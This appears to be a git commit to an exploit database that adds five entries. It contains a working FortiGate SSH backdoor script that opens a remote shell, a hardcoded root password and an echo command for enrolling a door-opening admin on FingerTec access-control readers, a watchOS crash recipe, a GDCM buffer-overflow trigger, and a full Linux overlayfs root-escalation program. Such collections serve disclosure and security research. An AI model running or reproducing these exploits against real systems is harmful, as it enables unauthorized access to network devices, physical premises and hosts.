DB: 2016-01-13

5 new exploits
2016-01-13 05:04:32 +00:00 · 2016-01-13 05:04:32 +00:00 · cecdd9a527
commit cecdd9a527
parent f66728545e
6 changed files with 476 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35399,6 +35399,8 @@ id,file,description,date,author,platform,type,port
 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
 39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0
 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
@ -35469,3 +35471,6 @@ id,file,description,date,author,platform,type,port
 39221,platforms/win64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win64,dos,0
 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy Remote Command Injection Vulnerability",2014-06-05,"Lukas Zapletal",multiple,remote,0
 39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0
 39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
 39230,platforms/linux/local/39230.c,"Linux Kernel overlayfs - Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
--- a/platforms/hardware/dos/39225.txt
+++ b/platforms/hardware/dos/39225.txt
@ -0,0 +1,25 @@
 #[+] Title:  Apple watchOS - Remote Crash Exploit
 #[+] Product: Apple
 #[+] Vendor: www.apple.com
 #[+] SoftWare Link : www.apple.com/watchos-2/
 #[+] Vulnerable Version(s): watchOS on IOS 9.0.1
 #
 #
 # Author      :   Mohammad Reza Espargham
 # Linkedin    :   https://ir.linkedin.com/in/rezasp
 # E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
 # Website     :   www.reza.es
 # Twitter     :   https://twitter.com/rezesp
 # FaceBook    :   https://www.facebook.com/reza.espargham
 #  1. open your phone Clock / goto Alarm
 # 2. add alarm / set time [for example two minutes later]
 # 3. click label /  input 5000 x “0"
 # 4. Save
 # 5. Lock Your phone and wait for alarm
 # 6. When the alarm clock rings / Watch Crashed ;)
--- a/platforms/hardware/remote/39224.py
+++ b/platforms/hardware/remote/39224.py
@ -0,0 +1,77 @@
 #!/usr/bin/env python
 # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
 # Usage: ./fgt_ssh_backdoor.py <target-ip>
 import socket
 import select
 import sys
 import paramiko
 from paramiko.py3compat import u
 import base64
 import hashlib
 import termios
 import tty
 def custom_handler(title, instructions, prompt_list):
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]
 def main():
    if len(sys.argv) < 2:
        print 'Usage: ' + sys.argv[0] + ' <target-ip>'
        exit(-1)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
    except paramiko.ssh_exception.SSHException:
        pass
    trans = client.get_transport()
    try:
        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
    except paramiko.ssh_exception.AuthenticationException:
        pass
    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
    chan = client.invoke_shell()
    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)
        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)
    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
 if __name__ == '__main__':
    main()
--- a/platforms/hardware/remote/39227.txt
+++ b/platforms/hardware/remote/39227.txt
@ -0,0 +1,23 @@
 # Exploit Title: Default Root Password and Remote Enrollment on FingerTec Devices 
 # Date: 12-01-2016 
 # Exploit Author: Daniel Lawson 
 # Contact: http://twitter.com/fang0654 
 # Website: https://digital-panther.com 
 # Category: physical access control 
 1. Description 
 Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door. 
 2. Proof of Concept 
 Login to telnet with the credentials: root / founder88 
 At the console type in the command: 
 echo -n -e \\\\x39\\\\x5\\\\x6\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x48\\\\x61\\\\x78\\\\x78\\\\x30\\\\x72\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x1\\\\x0\\\\x0\\\\x39\\\\x5\\\\x0\\\\x0 >> user.dat 
 This will create a user named Haxx0r with an id of 1337 and a pin of 12345. 
 --- 
 Daniel Lawson 
 Digital Panther Security 
 https://digital-panther.com 
--- a/platforms/linux/dos/39229.cpp
+++ b/platforms/linux/dos/39229.cpp
@ -0,0 +1,89 @@
 /*
 Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
 images.
 It provides routines to view and manipulate a wide range of image formats
 and can be accessed through many popular programming languages like Python,
 C#, Java and PHP.
 GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
 to an
 integer overflow vulnerability which leads to a buffer overflow and
 potentially to remote code execution. The vulnerability is triggered by the
 exposed function gdcm::ImageRegionReader::ReadIntoBuffer, which copies
 DICOM
 image data to a buffer. ReadIntoBuffer checks whether the supplied
 buffer is
 large enough to hold the necessary data, however in this check it fails to
 detect the occurrence of an integer overflow, which leads to a buffer
 overflow
 later on in the code. The buffer overflow will occur regardless of the
 size of
 the buffer supplied to the ReadIntoBuffer call.
 More information about this vulnerability can be found at
 http://census-labs.com/news/2016/01/11/gdcm-buffer-overflow-imageregionreaderreadintobuffer/
 The GDCM project has released version 2.6.2 that addresses this issue.
 It is advised to upgrade all GDCM installations to the latest stable
 release.
 Disclosure Timeline
 -------------------
 CVE assignment:    December 2nd, 2015
 Vendor Contact:    December 4th, 2015
 Vendor Patch Release: December 23rd, 2015
 Public Advisory: January 11th, 2016
 */
 #include "gdcmReader.h"
 #include "gdcmImageReader.h"
 #include "gdcmImageRegionReader.h"
 #include "gdcmBoxRegion.h"
 #include "gdcmImageHelper.h"
 #include <iostream>
 using namespace std;
 /*
 * A simple demonstration of CVE-2015-8396
 * by Stelios Tsampas (stelios at census-labs.com)
 * based on http://gdcm.sourceforge.net/html/ExtractImageRegion_8cs-example.html
 *
 * Compiles with:
 * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED
 *
 * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2
 *                https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39229.zip
 * $ bzip2 -d CVE-2015-8396.dcm.bz2
 * $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm
 */
 int main(int argc, char *argv [])
 {
 	char buffer[2048 * 2047];
 	gdcm::ImageRegionReader reader;
 	gdcm::BoxRegion box;
 	if (argc < 2) {
 		cout << "Usage: example <input-file>\n";
 		return 1;
 	}
 	const char *filename = argv[1];
 	reader.SetFileName(filename);
 	if (!reader.ReadInformation()) {
 		cout << "No info from file\n";
 		return 1;
 	}
 	std::vector<unsigned int> dims = gdcm::ImageHelper::GetDimensionsValue(reader.GetFile());
 	cout << "x: " << dims[0] << ", y: " << dims[1] << ", z: " << dims[2] << "\n";
 	box.SetDomain(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1);
 	reader.SetRegion(box);
 	reader.ReadIntoBuffer(buffer, sizeof(buffer));
 	return 0;
 }
--- a/platforms/linux/local/39230.c
+++ b/platforms/linux/local/39230.c
@ -0,0 +1,257 @@
 /** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2015 halfdog <me (%) halfdog.net>
 *
 *  This program demonstrates how to escalate privileges using
 *  an overlayfs mount within a user namespace. See
 *  http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
 *  for more information.
 *
 *  gcc -o UserNamespaceOverlayfsSetuidWriteExec UserNamespaceOverlayfsSetuidWriteExec.c
 *
 *  Usage: UserNamespaceOverlayfsSetuidWriteExec -- [program] [args]
 *
 */
 #define _GNU_SOURCE
 #include <errno.h>
 #include <fcntl.h>
 #include <sched.h>
 #include <sys/stat.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/mount.h>
 #include <sys/resource.h>
 #include <sys/wait.h>
 #include <unistd.h>
 extern char **environ;
 static int childFunc(void *arg) {
  fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
  while(geteuid()!=0) {
    usleep(100);
  }
  fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
  int result=mount("overlayfs", "/tmp/x/bin", "overlayfs", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/x/over,workdir=/tmp/x/bin");
  if(result) {
    fprintf(stderr, "Overlay mounting failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }
  chdir("/tmp/x/bin");
  result=chmod("su", 04777);
  if(result) {
    fprintf(stderr, "Mode change failed\n");
    return(1);
  }
  fprintf(stderr, "Namespace helper waiting for modification completion\n");
  struct stat statBuf;
  char checkPath[128];
  sprintf(checkPath, "/proc/%d", getppid());
  while(1) {
    usleep(100);
    result=stat(checkPath, &statBuf);
    if(result) {
      fprintf(stderr, "Namespacer helper: parent terminated\n");
      break;
    }
 // Wait until parent has escalated.
    if(statBuf.st_uid) break;
  }
  chdir("/");
  umount("/tmp/x/bin");
  unlink("/tmp/x/over/su");
  rmdir("/tmp/x/over");
  rmdir("/tmp/x/bin/work");
  rmdir("/tmp/x/bin");
  rmdir("/tmp/x/");
  fprintf(stderr, "Namespace part completed\n");
  return(0);
 }
 #define STACK_SIZE (1024 * 1024)
 static char child_stack[STACK_SIZE];
 int main(int argc, char *argv[]) {
  int argPos;
  int result;
  char *targetSuidPath="/bin/su";
  char *helperSuidPath="/bin/mount";
  for(argPos=1; argPos<argc; argPos++) {
    char *argName=argv[argPos];
    if(!strcmp(argName, "--")) {
      argPos++;
      break;
    }
    if(strncmp(argName, "--", 2)) {
      break;
    }
    fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
    exit(1);
  }
  mkdir("/tmp/x", 0700);
  mkdir("/tmp/x/bin", 0700);
  mkdir("/tmp/x/over", 0700);
 // Create child; child commences execution in childFunc()
 // CLONE_NEWNS: new mount namespace
 // CLONE_NEWPID
 // CLONE_NEWUTS
  pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
      CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, argv+argPos);
  if(pid==-1) {
    fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }
  char idMapFileName[128];
  char idMapData[128];
  sprintf(idMapFileName, "/proc/%d/setgroups", pid);
  int setGroupsFd=open(idMapFileName, O_WRONLY);
  if(setGroupsFd<0) {
    fprintf(stderr, "Failed to open setgroups\n");
    return(1);
  }
  result=write(setGroupsFd, "deny", 4);
  if(result<0) {
    fprintf(stderr, "Failed to disable setgroups\n");
    return(1);
  }
  close(setGroupsFd);
  sprintf(idMapFileName, "/proc/%d/uid_map", pid);
  fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
  int uidMapFd=open(idMapFileName, O_WRONLY);
  if(uidMapFd<0) {
    fprintf(stderr, "Failed to open uid map\n");
    return(1);
  }
  sprintf(idMapData, "0 %d 1\n", getuid());
  result=write(uidMapFd, idMapData, strlen(idMapData));
  if(result<0) {
    fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }
  close(uidMapFd);
  sprintf(idMapFileName, "/proc/%d/gid_map", pid);
  fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
  int gidMapFd=open(idMapFileName, O_WRONLY);
  if(gidMapFd<0) {
    fprintf(stderr, "Failed to open gid map\n");
    return(1);
  }
  sprintf(idMapData, "0 %d 1\n", getgid());
  result=write(gidMapFd, idMapData, strlen(idMapData));
  if(result<0) {
    fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }
  close(gidMapFd);
 // Wait until /tmp/x/over/su exists
  struct stat statBuf;
  while(1) {
    usleep(100);
    result=stat("/tmp/x/over/su", &statBuf);
    if(!result) break;
  }
 // Overwrite the file
  sprintf(idMapFileName, "/proc/%d/cwd/su", pid);
 // No slashes allowed, everything else is OK.
  char suidExecMinimalElf[] = {
      0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
      0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
      0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
      0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
      0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
      0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
      0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
      0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 
      0x31, 0xc0, 0x04, 0xd0, 0xcd, 0x80,
      0x31, 0xc0, 0x89, 0xd0,
      0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
  };
  char *helperArgs[]={"/bin/mount", NULL};
  int destFd=open(idMapFileName, O_RDWR|O_CREAT|O_TRUNC, 07777);
  if(destFd<0) {
    fprintf(stderr, "Failed to open %s, error %s\n", idMapFileName, strerror(errno));
    return(1);
  }
  char *suidWriteNext=suidExecMinimalElf;
  char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
  while(suidWriteNext!=suidWriteEnd) {
    char *suidWriteTestPos=suidWriteNext;
    while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
      suidWriteTestPos++;
 // We cannot write any 0-bytes. So let seek fill up the file wihh
 // null-bytes for us.
    lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
    suidWriteNext=suidWriteTestPos;
    while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
      suidWriteTestPos++;
    pid_t helperPid=fork();
    if(!helperPid) {
      struct rlimit limits;
 // We can't truncate, that would remove the setgid property of
 // the file. So make sure the SUID binary does not write too much.
      limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
      limits.rlim_max=limits.rlim_cur;
      setrlimit(RLIMIT_FSIZE, &limits);
 // Do not rely on some SUID binary to print out the unmodified
 // program name, some OSes might have hardening against that.
 // Let the ld-loader will do that for us.
      limits.rlim_cur=1<<22;
      limits.rlim_max=limits.rlim_cur;
      result=setrlimit(RLIMIT_AS, &limits);
      dup2(destFd, 1);
      dup2(destFd, 2);
      helperArgs[0]=suidWriteNext;
      execve(helperSuidPath, helperArgs, NULL);
      fprintf(stderr, "Exec failed\n");
      return(1);
    }
    waitpid(helperPid, NULL, 0);
    suidWriteNext=suidWriteTestPos;
  }
  close(destFd);
  execve(idMapFileName, argv+argPos-1, NULL);
  fprintf(stderr, "Failed to execute %s: %d (%s)\n", idMapFileName,
      errno, strerror(errno));
  return(1);
 }